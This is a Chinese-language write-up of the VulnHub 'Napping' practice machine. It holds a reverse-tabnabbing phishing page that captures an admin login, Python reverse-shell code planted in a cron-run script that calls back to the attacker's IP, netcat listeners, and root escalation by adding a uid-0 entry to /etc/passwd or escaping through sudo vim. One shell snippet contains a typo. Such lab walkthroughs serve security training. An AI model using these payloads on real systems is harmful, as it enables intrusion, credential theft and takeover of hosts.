靶机练习No.5 VulnHub靶场 Napping

admin 2022年4月27日20:36:22评论100 views字数 2415阅读8分3秒阅读模式

靶机练习No.5 VulnHub靶场 Napping


攻击机IP:192.168.43.86

主机发现:sudo nmap -sP 192.168.43.1/24

--> 目标IP: 192.168.43.91

端口扫描:sudo nmap -sC -sV -p- 192.168.43.91

--> 开放端口:22,80

浏览器访问80端口:登录页面,可以注册,注册一个账号:aa 密码:bbbbbb

--> 登录后跳转welcome.php页面  Blog Lnk: http://hao123.com

--> 点击here后回跳转到添加的链接,Here设置了a标签,target=_blank

target=_blank  --> 在新窗口中打开链接
target=_self --> 在原窗口打开一个新页面

tabnnabing钓鱼原理:
使用正常网站A的a标签设置为恶意网站B,恶意网站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常网站A页面修改为钓鱼网站C页面。
两个可以利用点:
1、使用a标签,并且target=_blank,没有使用rel="noopener/noreferrer"属性
2、使用window.open

在网站传输恶意页面nadding.html


<!DOCTYPE html>
<html>
<body>
   <script>
     if(window.opener) mainframe.location.replace=('http://192.168.43.118:7777/login.html');
     if(window.opener  != window) mainframe.location.replace=('http://192.168.43.118:7777/login.html');
</script>
</body>
</html>

需要使用python3开启http服务器:

python3 -m http.server 80

然后在攻击机上开启7777端口监听:nc -lvvp 7777

等待管理员检查的时候,会得到管理员的账号:daniel 密码:C@40ughtm3napping123

使用ssh连接服务器:ssh [email protected]

连接成功。

反弹shell:

find / -group administrators -type f 2>/dev/null

--> /home/adrian/query.py

cd /home/adrian

还有user.txt 和 site_status.txt两个文件夹

cat user.txt

--> Permission denied

查看query.py和site_status.txt:

--> query.py记录浏览站点状态的脚本,将信息记录到site_ststus.txt中。两分钟检查一次

修改query.py脚本,代码中加入反弹shell代码:

import socket,suprocess,os
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.43.86',4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
python -c '
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.10.11",443));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")'

在kali上开启监听4444端口:nc -lvvp 4444

过一段时间成功反弹shell

拿到完整交互shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL + Z
stty -a
stty raw -echo;fg
reset

提升权限:

方法一:添加root账户

查看用户权限:sudo -l

--> 显示以root身份运行不需要密码

添加管理员账号:
passwd账号格式:用户名:密码:uid:gid:注释:home目录:用户的shell
root账号的格式:root:0:0:root:/root:/bin/bash

生成密码:
openssl passwd -1 -salt aaa 123  
<!-- 使用生成密码登录时不成功,去掉salt 123生成的密码登陆成功 --!>
passwd生成密码
-1使用md5加密
-salt string加入随机数,最多8位

使用openssl生成密码:

openssl passwd -1 aaa

--> $1$D08M/VIx$aM/UxkkZsen01SUWhVdYt.

sudo vim /etc/passwd

最后一行加入:

aaa:$1$D08M/VIx$aM/UxkkZsen01SUWhVdYt.:0:0:/aaa:/bin/bash

su aaa   --> 登录创建的root用户,密码aaa

登陆成功!


方法二:使用vim-shell

写入vim-shell:

sudo /usr/bin/vim -c ':!/bin/sh'

得到root

whoami -> root

ls -> root.txt

cat root.txt





靶机练习No.5 VulnHub靶场 Napping
pluck靶机介绍
VulnHub-FristiLeaks: 1.3-Walkthrough
VulnHub-PwnLab-Walkthrough
记一次Tomcat8-弱口令与后台上传getshell的漏洞复现

靶机练习No.5 VulnHub靶场 Napping


原文始发于微信公众号(北京路劲科技有限公司):靶机练习No.5 VulnHub靶场 Napping

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月27日20:36:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   靶机练习No.5 VulnHub靶场 Nappinghttp://cn-sec.com/archives/952530.html

发表评论

匿名网友 填写信息